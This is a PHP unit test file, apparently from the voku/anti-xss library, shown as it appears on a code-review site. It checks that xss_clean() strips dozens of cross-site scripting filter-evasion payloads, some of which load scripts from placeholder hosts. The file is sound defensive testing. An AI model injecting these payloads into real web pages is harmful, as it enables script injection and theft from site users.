static::assertSame('<img src="">" alt="bar" title="(\'XSS\');">', $this->antiXss->xss_clean($testString)); |
|
1294
|
|
|
|
|
1295
|
|
|
$testString = '<img/src/onerror=alert(1)>'; |
|
1296
|
|
|
static::assertSame('<img/>', $this->antiXss->xss_clean($testString)); |
|
1297
|
|
|
} |
|
1298
|
|
|
|
|
1299
|
|
|
public function testXssUrlDecode() |
|
1300
|
|
|
{ |
|
1301
|
|
|
$testArray = [ |
|
1302
|
|
|
'<scri + pt>' => '', |
|
1303
|
|
|
'<scri pt>' => '', |
|
1304
|
|
|
'<scri\' \'pt>' => '', |
|
1305
|
|
|
'<scri\' + \'pt>' => '', |
|
1306
|
|
|
]; |
|
1307
|
|
|
|
|
1308
|
|
|
foreach ($testArray as $before => $after) { |
|
1309
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), $before); |
|
1310
|
|
|
} |
|
1311
|
|
|
} |
|
1312
|
|
|
|
|
1313
|
|
View Code Duplication |
public function testXssCleanEntityDoubleEncoded() |
|
|
|
|
|
|
1314
|
|
|
{ |
|
1315
|
|
|
$testArray = [ |
|
1316
|
|
|
'<IMG SRC=javascript:alert('XSS')>' => '<IMG >', |
|
1317
|
|
|
'<IMG SRC=javascript:alert('XSS')>' => '<IMG >', |
|
1318
|
|
|
"<IMG SRC=\"jav	ascript:alert('XSS');\">" => '<IMG SRC="(\'XSS\');">', |
|
1319
|
|
|
'<IMG SRC=javascript:alert('XSS')>' => '<IMG >', |
|
1320
|
|
|
'<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>' => '<a href="(1)">Clickhere</a>', |
|
1321
|
|
|
'<a href="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">Google</a>' => '<a href="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">Google</a>', // no-xss (http://www.google.com) |
|
1322
|
|
|
]; |
|
1323
|
|
|
|
|
1324
|
|
|
foreach ($testArray as $before => $after) { |
|
1325
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), $before); |
|
1326
|
|
|
} |
|
1327
|
|
|
} |
|
1328
|
|
|
|
|
1329
|
|
|
public function testXssCleanJsImgRemoval() |
|
1330
|
|
|
{ |
|
1331
|
|
|
$input = '<img src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere'; |
|
1332
|
|
|
static::assertSame('<img src="(1)">Clickhere', $this->antiXss->xss_clean($input), $input); |
|
1333
|
|
|
} |
|
1334
|
|
|
|
|
1335
|
|
|
public function testXssCleanJsARemoval() |
|
1336
|
|
|
{ |
|
1337
|
|
|
$input = '<a src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere'; |
|
1338
|
|
|
static::assertSame('<a src="(1)">Clickhere', $this->antiXss->xss_clean($input), $input); |
|
1339
|
|
|
} |
|
1340
|
|
|
|
|
1341
|
|
|
public function testXssCleanJsDivRemoval() |
|
1342
|
|
|
{ |
|
1343
|
|
|
$input = '<div test="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere'; |
|
1344
|
|
|
static::assertSame('<div test="(1)">Clickhere', $this->antiXss->xss_clean($input), $input); |
|
1345
|
|
|
|
|
1346
|
|
|
$input = '<div test="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</div>'; |
|
1347
|
|
|
static::assertSame('<div test="(1)">Clickhere</div>', $this->antiXss->xss_clean($input), $input); |
|
1348
|
|
|
|
|
1349
|
|
|
$input = '<div onClick="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</div>'; |
|
1350
|
|
|
static::assertSame('<div >Clickhere</div>', $this->antiXss->xss_clean($input), $input); |
|
1351
|
|
|
|
|
1352
|
|
|
$input = '<div onClick="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere'; |
|
1353
|
|
|
static::assertSame('<div >Clickhere', $this->antiXss->xss_clean($input), $input); |
|
1354
|
|
|
|
|
1355
|
|
|
$input = '<div onClick=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41>Clickhere'; |
|
1356
|
|
|
static::assertSame('<div >Clickhere', $this->antiXss->xss_clean($input), $input); |
|
1357
|
|
|
} |
|
1358
|
|
|
|
|
1359
|
|
|
public function testNaughtyHtmlPlusEvilAttributes() |
|
1360
|
|
|
{ |
|
1361
|
|
|
static::assertSame('<svg<img > src="x">', $this->antiXss->xss_clean('<svg<img > src="x" onerror="location=/javascript/.source+/:alert/.source+/(1)/.source">')); |
|
1362
|
|
|
} |
|
1363
|
|
|
|
|
1364
|
|
|
public function testXssCleanSanitizeNaughtyHtml() |
|
1365
|
|
|
{ |
|
1366
|
|
|
static::assertSame('<unclosedTag', $this->antiXss->xss_clean('<unclosedTag')); |
|
1367
|
|
|
static::assertSame('<blink>', $this->antiXss->xss_clean('<blink>')); |
|
1368
|
|
|
static::assertSame('<fubar>', $this->antiXss->xss_clean('<fubar>')); |
|
1369
|
|
|
static::assertSame('<img &svg="" src="x">', $this->antiXss->xss_clean('<img <svg=""> src="x">')); |
|
1370
|
|
|
static::assertSame('<img src="b on=">on=">"x ="alert(1)">', $this->antiXss->xss_clean('<img src="b on="<x">on=">"x onerror="alert(1)">')); |
|
1371
|
|
|
} |
|
1372
|
|
|
|
|
1373
|
|
|
public function testXssCleanSanitizeNaughtyHtmlAttributes() |
|
1374
|
|
|
{ |
|
1375
|
|
|
static::assertSame('="bar"', $this->antiXss->xss_clean('onAttribute="bar"')); |
|
1376
|
|
|
static::assertSame('<foo >', $this->antiXss->xss_clean('<foo onAttribute="bar">')); |
|
1377
|
|
|
static::assertSame('<foo >', $this->antiXss->xss_clean('<foo onAttributeNoQuotes=bar>')); |
|
1378
|
|
|
static::assertSame('<foo >', $this->antiXss->xss_clean('<foo onAttributeWithSpaces = bar>')); |
|
1379
|
|
|
static::assertSame('<foo prefixOnAttribute="bar">', $this->antiXss->xss_clean('<foo prefixOnAttribute="bar">')); |
|
1380
|
|
|
static::assertSame('<foo>onOutsideOfTag=test</foo>', $this->antiXss->xss_clean('<foo>onOutsideOfTag=test</foo>')); |
|
1381
|
|
|
static::assertSame('onNoTagAtAll = true', $this->antiXss->xss_clean('onNoTagAtAll = true')); |
|
1382
|
|
|
static::assertSame('<foo bar=">" baz=\'>\' onAfterGreaterThan="quotes">', $this->antiXss->xss_clean('<foo bar=">" baz=\'>\' onAfterGreaterThan="quotes">')); |
|
1383
|
|
|
static::assertSame('<foo bar=">" baz=\'>\' onAfterGreaterThan=noQuotes>', $this->antiXss->xss_clean('<foo bar=">" baz=\'>\' onAfterGreaterThan=noQuotes>')); |
|
1384
|
|
|
static::assertSame('<img src="x" on=""> on=<svg> =alert(1)>', $this->antiXss->xss_clean('<img src="x" on=""> on=<svg> onerror=alert(1)>')); |
|
1385
|
|
|
static::assertSame('<img src="on=\'">"<svg> =alert(1) =alert(1)>', $this->antiXss->xss_clean('<img src="on=\'">"<svg> onerror=alert(1) onmouseover=alert(1)>')); |
|
1386
|
|
|
static::assertSame('<img src="x"> on=\'x\' =``,alert(1)>', $this->antiXss->xss_clean('<img src="x"> on=\'x\' onerror=``,alert(1)>')); |
|
1387
|
|
|
static::assertSame('<img src="x"> on=\'x\' ononerror=error=``,alert(1)>', $this->antiXss->xss_clean('<img src="x"> on=\'x\' ononerror=error=``,alert(1)>')); |
|
1388
|
|
|
static::assertSame('<img src="0" width="0" alt="src=" />', $this->antiXss->xss_clean('<img src="0" width="0" alt="src="src=0 width=0 onerror=alert(unescape(/dang%20quotes!/.source))//\" />')); |
|
1389
|
|
|
static::assertSame('<a< >', $this->antiXss->xss_clean('<a< onmouseover="alert(1)">')); |
|
1390
|
|
|
static::assertSame('<img src="x"> on=\'x\' =,xssm()>', $this->antiXss->xss_clean('<img src="x"> on=\'x\' onerror=,xssm()>')); |
|
1391
|
|
|
static::assertSame('<image src="<>" =\'alert(1)\'>', $this->antiXss->xss_clean('<image src="<>" onerror=\'alert(1)\'>')); |
|
1392
|
|
|
static::assertSame('<b "=<= >', $this->antiXss->xss_clean('<b "=<= onmouseover=alert(1)>')); |
|
1393
|
|
|
static::assertSame('<b a=<=" >', $this->antiXss->xss_clean('<b a=<=" onmouseover="alert(1),1>1">')); |
|
1394
|
|
|
static::assertSame('<b "="< x=" =alert(1)//">', $this->antiXss->xss_clean('<b "="< x=" onmouseover=alert(1)//">')); |
|
1395
|
|
|
static::assertSame('<meta http-equiv="refresh" content="0;url=;">', $this->antiXss->xss_clean('<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">')); |
|
1396
|
|
|
static::assertSame('<><<meta <meta http-equiv="refresh" content="5; URL=https://foo.bar?hacked=1/">', $this->antiXss->xss_clean('<><<meta <meta http-equiv="refresh" content="5; URL=https://foo.bar?hacked=1/">')); |
|
1397
|
|
|
static::assertSame('--><!-- --\x3E> <img > -->', $this->antiXss->xss_clean('--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->')); |
|
1398
|
|
|
} |
|
1399
|
|
|
|
|
1400
|
|
|
/** |
|
1401
|
|
|
* all tests from drupal |
|
1402
|
|
|
*/ |
|
1403
|
|
|
public function testXss() |
|
1404
|
|
|
{ |
|
1405
|
|
|
$cases = [ |
|
1406
|
|
|
// Tag stripping, different ways to work around removal of HTML tags. |
|
1407
|
|
|
[ |
|
1408
|
|
|
'<script>alert(0)</script>', |
|
1409
|
|
|
'', |
|
1410
|
|
|
'script', |
|
1411
|
|
|
'HTML tag stripping -- simple script without special characters.', |
|
1412
|
|
|
], |
|
1413
|
|
|
[ |
|
1414
|
|
|
'<script src="http://www.example.com" />', |
|
1415
|
|
|
'', |
|
1416
|
|
|
'script', |
|
1417
|
|
|
'HTML tag stripping -- empty script with source.', |
|
1418
|
|
|
], |
|
1419
|
|
|
[ |
|
1420
|
|
|
'<ScRipt sRc=http://www.example.com/>', |
|
1421
|
|
|
'', |
|
1422
|
|
|
'script', |
|
1423
|
|
|
'HTML tag stripping evasion -- varying case.', |
|
1424
|
|
|
], |
|
1425
|
|
|
[ |
|
1426
|
|
|
"<script\nsrc\n=\nhttp://www.example.com/\n>", |
|
1427
|
|
|
'', |
|
1428
|
|
|
'script', |
|
1429
|
|
|
'HTML tag stripping evasion -- multiline tag.', |
|
1430
|
|
|
], |
|
1431
|
|
|
[ |
|
1432
|
|
|
'<script/a src=http://www.example.com/a.js></script>', |
|
1433
|
|
|
'', |
|
1434
|
|
|
'script', |
|
1435
|
|
|
'HTML tag stripping evasion -- non whitespace character after tag name.', |
|
1436
|
|
|
], |
|
1437
|
|
|
[ |
|
1438
|
|
|
'<script/src=http://www.example.com/a.js></script>', |
|
1439
|
|
|
'', |
|
1440
|
|
|
'script', |
|
1441
|
|
|
'HTML tag stripping evasion -- no space between tag and attribute.', |
|
1442
|
|
|
], |
|
1443
|
|
|
// Null between < and tag name works at least with IE6. |
|
1444
|
|
|
[ |
|
1445
|
|
|
"<\0scr\0ipt>alert(0)</script>", |
|
1446
|
|
|
'', |
|
1447
|
|
|
'ipt', |
|
1448
|
|
|
'HTML tag stripping evasion -- breaking HTML with nulls.', |
|
1449
|
|
|
], |
|
1450
|
|
|
[ |
|
1451
|
|
|
'<scrscriptipt src=http://www.example.com/a.js>', |
|
1452
|
|
|
'<scrscriptipt src=http://www.example.com/a.js>', |
|
1453
|
|
|
'script', |
|
1454
|
|
|
'HTML tag stripping evasion -- filter just removing "script".', |
|
1455
|
|
|
], |
|
1456
|
|
|
[ |
|
1457
|
|
|
'<<script>alert(0);//<</script>', |
|
1458
|
|
|
'<', |
|
1459
|
|
|
'script', |
|
1460
|
|
|
'HTML tag stripping evasion -- double opening brackets.', |
|
1461
|
|
|
], |
|
1462
|
|
|
[ |
|
1463
|
|
|
'< <script >alert(0);//<</ script >', |
|
1464
|
|
|
'< ', |
|
1465
|
|
|
'script', |
|
1466
|
|
|
'HTML tag stripping evasion -- double opening brackets.', |
|
1467
|
|
|
], |
|
1468
|
|
|
[ |
|
1469
|
|
|
'< <script< >alert(0);//<</ script >', |
|
1470
|
|
|
'< ', |
|
1471
|
|
|
'script', |
|
1472
|
|
|
'HTML tag stripping evasion -- double opening brackets.', |
|
1473
|
|
|
], |
|
1474
|
|
|
[ |
|
1475
|
|
|
'<script src=http://www.example.com/a.js?<b>', |
|
1476
|
|
|
'', |
|
1477
|
|
|
'script', |
|
1478
|
|
|
'HTML tag stripping evasion -- no closing tag.', |
|
1479
|
|
|
], |
|
1480
|
|
|
// DRUPAL-SA-2008-047: This doesn't seem exploitable, but the filter should |
|
1481
|
|
|
// work consistently. |
|
1482
|
|
|
[ |
|
1483
|
|
|
'<script>>', |
|
1484
|
|
|
'', |
|
1485
|
|
|
'script', |
|
1486
|
|
|
'HTML tag stripping evasion -- double closing tag.', |
|
1487
|
|
|
], |
|
1488
|
|
|
[ |
|
1489
|
|
|
'<script src=//www.example.com/.a>', |
|
1490
|
|
|
'', |
|
1491
|
|
|
'script', |
|
1492
|
|
|
'HTML tag stripping evasion -- no scheme or ending slash.', |
|
1493
|
|
|
], |
|
1494
|
|
|
[ |
|
1495
|
|
|
'<script src=http://www.example.com/.a', |
|
1496
|
|
|
'', |
|
1497
|
|
|
'script', |
|
1498
|
|
|
'HTML tag stripping evasion -- no closing bracket.', |
|
1499
|
|
|
], |
|
1500
|
|
|
[ |
|
1501
|
|
|
'<script src=http://www.example.com/ <', |
|
1502
|
|
|
'', |
|
1503
|
|
|
'script', |
|
1504
|
|
|
'HTML tag stripping evasion -- opening instead of closing bracket.', |
|
1505
|
|
|
], |
|
1506
|
|
|
[ |
|
1507
|
|
|
'<nosuchtag attribute="newScriptInjectionVector">', |
|
1508
|
|
|
'<nosuchtag attribute="newScriptInjectionVector">', |
|
1509
|
|
|
'nosuchtag', |
|
1510
|
|
|
'HTML tag stripping evasion -- unknown tag.', |
|
1511
|
|
|
], |
|
1512
|
|
|
[ |
|
1513
|
|
|
'<t:set attributeName="innerHTML" to="<script defer>alert(0)</script>">', |
|
1514
|
|
|
'<t:set attributeName="innerHTML" to="alert(0)">', |
|
1515
|
|
|
't:set', |
|
1516
|
|
|
'HTML tag stripping evasion -- colon in the tag name (namespaces\' tricks).', |
|
1517
|
|
|
], |
|
1518
|
|
|
[ |
|
1519
|
|
|
'<img """><script>alert(0)</script>', |
|
1520
|
|
|
'<img """>', |
|
1521
|
|
|
'script', |
|
1522
|
|
|
'HTML tag stripping evasion -- a malformed image tag.', |
|
1523
|
|
|
['img'], |
|
1524
|
|
|
], |
|
1525
|
|
|
[ |
|
1526
|
|
|
'<blockquote><script>alert(0)</script></blockquote>', |
|
1527
|
|
|
'<blockquote></blockquote>', |
|
1528
|
|
|
'script', |
|
1529
|
|
|
'HTML tag stripping evasion -- script in a blockqoute.', |
|
1530
|
|
|
['blockquote'], |
|
1531
|
|
|
], |
|
1532
|
|
|
[ |
|
1533
|
|
|
'<!--[if true]><script>alert(0)</script><![endif]-->', |
|
1534
|
|
|
'<!--[if true]><![endif]-->', |
|
1535
|
|
|
'script', |
|
1536
|
|
|
'HTML tag stripping evasion -- script within a comment.', |
|
1537
|
|
|
], |
|
1538
|
|
|
// Dangerous attributes removal. |
|
1539
|
|
|
[ |
|
1540
|
|
|
'<p onmouseover="http://www.example.com/">', |
|
1541
|
|
|
'<p >', |
|
1542
|
|
|
'onmouseover', |
|
1543
|
|
|
'HTML filter attributes removal -- events, no evasion.', |
|
1544
|
|
|
['p'], |
|
1545
|
|
|
], |
|
1546
|
|
|
[ |
|
1547
|
|
|
'<li style="list-style-image: url(javascript:alert(0))">', |
|
1548
|
|
|
'<li >', |
|
1549
|
|
|
'style', |
|
1550
|
|
|
'HTML filter attributes removal -- style, no evasion.', |
|
1551
|
|
|
['li'], |
|
1552
|
|
|
], |
|
1553
|
|
|
[ |
|
1554
|
|
|
'<img onerror =alert(0)>', |
|
1555
|
|
|
'<img >', |
|
1556
|
|
|
'onerror', |
|
1557
|
|
|
'HTML filter attributes removal evasion -- spaces before equals sign.', |
|
1558
|
|
|
['img'], |
|
1559
|
|
|
], |
|
1560
|
|
|
[ |
|
1561
|
|
|
'<img onabort!#$%&()*~+-_.,:;?@[/|\]^`=alert(0)>', |
|
1562
|
|
|
'<img >', |
|
1563
|
|
|
'onabort', |
|
1564
|
|
|
'HTML filter attributes removal evasion -- non alphanumeric characters before equals sign.', |
|
1565
|
|
|
['img'], |
|
1566
|
|
|
], |
|
1567
|
|
|
[ |
|
1568
|
|
|
'<img oNmediAError=alert(0)>', |
|
1569
|
|
|
'<img >', |
|
1570
|
|
|
'onmediaerror', |
|
1571
|
|
|
'HTML filter attributes removal evasion -- varying case.', |
|
1572
|
|
|
['img'], |
|
1573
|
|
|
], |
|
1574
|
|
|
// Works at least with IE6. |
|
1575
|
|
|
[ |
|
1576
|
|
|
"<img o\0nfocus\0=alert(0)>", |
|
1577
|
|
|
'<img >', |
|
1578
|
|
|
'focus', |
|
1579
|
|
|
'HTML filter attributes removal evasion -- breaking with nulls.', |
|
1580
|
|
|
['img'], |
|
1581
|
|
|
], |
|
1582
|
|
|
// Only whitelisted scheme names allowed in attributes. |
|
1583
|
|
|
[ |
|
1584
|
|
|
'<img src="javascript:alert(0)">', |
|
1585
|
|
|
'<img src="(0)">', |
|
1586
|
|
|
'javascript', |
|
1587
|
|
|
'HTML scheme clearing -- no evasion.', |
|
1588
|
|
|
['img'], |
|
1589
|
|
|
], |
|
1590
|
|
|
[ |
|
1591
|
|
|
'<img src=javascript:alert(0)>', |
|
1592
|
|
|
'<img >', |
|
1593
|
|
|
'javascript', |
|
1594
|
|
|
'HTML scheme clearing evasion -- no quotes.', |
|
1595
|
|
|
['img'], |
|
1596
|
|
|
], |
|
1597
|
|
|
// A bit like CVE-2006-0070. |
|
1598
|
|
|
[ |
|
1599
|
|
|
'<img src="javascript:confirm(0)">', |
|
1600
|
|
|
'<img src="(0)">', |
|
1601
|
|
|
'javascript', |
|
1602
|
|
|
'HTML scheme clearing evasion -- no alert ;)', |
|
1603
|
|
|
['img'], |
|
1604
|
|
|
], |
|
1605
|
|
|
[ |
|
1606
|
|
|
'<img src=`javascript:alert(0)`>', |
|
1607
|
|
|
'<img >', |
|
1608
|
|
|
'javascript', |
|
1609
|
|
|
'HTML scheme clearing evasion -- grave accents.', |
|
1610
|
|
|
['img'], |
|
1611
|
|
|
], |
|
1612
|
|
|
[ |
|
1613
|
|
|
'<img dynsrc="javascript:alert(0)">', |
|
1614
|
|
|
'<img dynsrc="(0)">', |
|
1615
|
|
|
'javascript', |
|
1616
|
|
|
'HTML scheme clearing -- rare attribute.', |
|
1617
|
|
|
['img'], |
|
1618
|
|
|
], |
|
1619
|
|
|
[ |
|
1620
|
|
|
'<table background="javascript:alert(0)">', |
|
1621
|
|
|
'<table background="(0)">', |
|
1622
|
|
|
'javascript', |
|
1623
|
|
|
'HTML scheme clearing -- another tag.', |
|
1624
|
|
|
['table'], |
|
1625
|
|
|
], |
|
1626
|
|
|
[ |
|
1627
|
|
|
'<base href="javascript:alert(0);//">', |
|
1628
|
|
|
'<base href="(0);//">', |
|
1629
|
|
|
'javascript', |
|
1630
|
|
|
'HTML scheme clearing -- one more attribute and tag.', |
|
1631
|
|
|
['base'], |
|
1632
|
|
|
], |
|
1633
|
|
|
[ |
|
1634
|
|
|
'<img src="jaVaSCriPt:alert(0)">', |
|
1635
|
|
|
'<img src="(0)">', |
|
1636
|
|
|
'javascript', |
|
1637
|
|
|
'HTML scheme clearing evasion -- varying case.', |
|
1638
|
|
|
['img'], |
|
1639
|
|
|
], |
|
1640
|
|
|
[ |
|
1641
|
|
|
'<img src=javascript:alert(0)>', |
|
1642
|
|
|
'<img >', |
|
1643
|
|
|
'javascript', |
|
1644
|
|
|
'HTML scheme clearing evasion -- UTF-8 decimal encoding.', |
|
1645
|
|
|
['img'], |
|
1646
|
|
|
], |
|
1647
|
|
|
[ |
|
1648
|
|
|
'<img src=javascript:alert(0)>', |
|
1649
|
|
|
'<img >', |
|
1650
|
|
|
'javascript', |
|
1651
|
|
|
'HTML scheme clearing evasion -- long UTF-8 encoding.', |
|
1652
|
|
|
['img'], |
|
1653
|
|
|
], |
|
1654
|
|
|
[ |
|
1655
|
|
|
'<img src=javascript:alert(0)>', |
|
1656
|
|
|
'<img >', |
|
1657
|
|
|
'javascript', |
|
1658
|
|
|
'HTML scheme clearing evasion -- UTF-8 hex encoding.', |
|
1659
|
|
|
['img'], |
|
1660
|
|
|
], |
|
1661
|
|
|
[ |
|
1662
|
|
|
"<img src=\"jav\tascript:alert(0)\">", |
|
1663
|
|
|
'<img src="(0)">', |
|
1664
|
|
|
'script', |
|
1665
|
|
|
'HTML scheme clearing evasion -- an embedded tab.', |
|
1666
|
|
|
['img'], |
|
1667
|
|
|
], |
|
1668
|
|
|
[ |
|
1669
|
|
|
'<img src="jav	ascript:alert(0)">', |
|
1670
|
|
|
'<img src="(0)">', |
|
1671
|
|
|
'script', |
|
1672
|
|
|
'HTML scheme clearing evasion -- an encoded, embedded tab.', |
|
1673
|
|
|
['img'], |
|
1674
|
|
|
], |
|
1675
|
|
|
[ |
|
1676
|
|
|
'<img src="jav
ascript:alert(0)">', |
|
1677
|
|
|
'<img src="(0)">', |
|
1678
|
|
|
'script', |
|
1679
|
|
|
'HTML scheme clearing evasion -- an encoded, embedded newline.', |
|
1680
|
|
|
['img'], |
|
1681
|
|
|
], |
|
1682
|
|
|
[ |
|
1683
|
|
|
"<img src=\"\n\n\nj\na\nva\ns\ncript:alert(0)\">", |
|
1684
|
|
|
'<img src=" |
|
1685
|
|
|
|
|
1686
|
|
|
|
|
1687
|
|
|
(0)">', |
|
1688
|
|
|
'cript', |
|
1689
|
|
|
'HTML scheme clearing evasion -- broken into many lines.', |
|
1690
|
|
|
['img'], |
|
1691
|
|
|
], |
|
1692
|
|
|
[ |
|
1693
|
|
|
"<img src=\"jav\0a\0\0cript:alert(0)\">", |
|
1694
|
|
|
'<img src="">', |
|
1695
|
|
|
'cript', |
|
1696
|
|
|
'HTML scheme clearing evasion -- embedded nulls.', |
|
1697
|
|
|
['img'], |
|
1698
|
|
|
], |
|
1699
|
|
|
[ |
|
1700
|
|
|
'<img src="vbscript:msgbox(0)">', |
|
1701
|
|
|
'<img src="(0)">', |
|
1702
|
|
|
'vbscript', |
|
1703
|
|
|
'HTML scheme clearing evasion -- another scheme.', |
|
1704
|
|
|
['img'], |
|
1705
|
|
|
], |
|
1706
|
|
|
[ |
|
1707
|
|
|
'<img src="nosuchscheme:notice(0)">', |
|
1708
|
|
|
'<img src="nosuchscheme:notice(0)">', |
|
1709
|
|
|
'nosuchscheme', |
|
1710
|
|
|
'HTML scheme clearing evasion -- unknown scheme.', |
|
1711
|
|
|
['img'], |
|
1712
|
|
|
], |
|
1713
|
|
|
// DRUPAL-SA-2008-006: Invalid UTF-8, these only work as reflected XSS with |
|
1714
|
|
|
// Internet Explorer 6. |
|
1715
|
|
|
[ |
|
1716
|
|
|
"<p arg=\"\xe0\">\" style=\"background-image: url(j\xe0avas\xc2\xa0cript:alert(0));\"\xe0<p>", |
|
1717
|
|
|
'<p arg="">" style="background-image: url((0));"<p>', |
|
1718
|
|
|
'style', |
|
1719
|
|
|
'HTML filter -- invalid UTF-8.', |
|
1720
|
|
|
['p'], |
|
1721
|
|
|
], |
|
1722
|
|
|
[ |
|
1723
|
|
|
'<img src="  javascript:alert(0)">', |
|
1724
|
|
|
'<img src="  (0)">', |
|
1725
|
|
|
'javascript', |
|
1726
|
|
|
'HTML scheme clearing evasion -- spaces and metacharacters before scheme.', |
|
1727
|
|
|
['img'], |
|
1728
|
|
|
], |
|
1729
|
|
|
]; |
|
1730
|
|
|
|
|
1731
|
|
|
foreach ($cases as $caseArray) { |
|
1732
|
|
|
static::assertSame($caseArray[1], $this->antiXss->xss_clean($caseArray[0]), 'error by: ' . $caseArray[0]); |
|
1733
|
|
|
} |
|
1734
|
|
|
} |
|
1735
|
|
|
|
|
1736
|
|
|
/** |
|
1737
|
|
|
* Call protected/private method of a class. |
|
1738
|
|
|
* |
|
1739
|
|
|
* @param object &$object Instantiated object that we will run method on |
|
1740
|
|
|
* @param string $methodName Method name to call |
|
1741
|
|
|
* @param array $parameters array of parameters to pass into method |
|
1742
|
|
|
* |
|
1743
|
|
|
* @return mixed method return |
|
1744
|
|
|
*/ |
|
1745
|
|
|
public function invokeMethod(&$object, $methodName, array $parameters = []) |
|
1746
|
|
|
{ |
|
1747
|
|
|
$reflection = new \ReflectionObject($object); |
|
1748
|
|
|
$method = $reflection->getMethod($methodName); |
|
1749
|
|
|
$method->setAccessible(true); |
|
1750
|
|
|
|
|
1751
|
|
|
return $method->invokeArgs($object, $parameters); |
|
1752
|
|
|
} |
|
1753
|
|
|
|
|
1754
|
|
|
/** |
|
1755
|
|
|
* Call protected/private method of a class. |
|
1756
|
|
|
* |
|
1757
|
|
|
* @param object &$object Instantiated object that we will run method on |
|
1758
|
|
|
* @param string $propertyName Property name |
|
1759
|
|
|
* |
|
1760
|
|
|
* @return mixed method return |
|
1761
|
|
|
*/ |
|
1762
|
|
|
public function invokeProperty(&$object, $propertyName) |
|
1763
|
|
|
{ |
|
1764
|
|
|
$reflection = new \ReflectionObject($object); |
|
1765
|
|
|
$property = $reflection->getProperty($propertyName); |
|
1766
|
|
|
$property->setAccessible(true); |
|
1767
|
|
|
|
|
1768
|
|
|
return $property->getValue($object); |
|
1769
|
|
|
} |
|
1770
|
|
|
} |
|
1771
|
|
|
|
voku /
anti-xss
Loading history...
Duplicated code is one of the most pungent code smells. If you need to duplicate the same code in three or more different places, we strongly encourage you to look into extracting the code into a single class or operation.
You can also find more detailed suggestions in the “Code” section of your repository.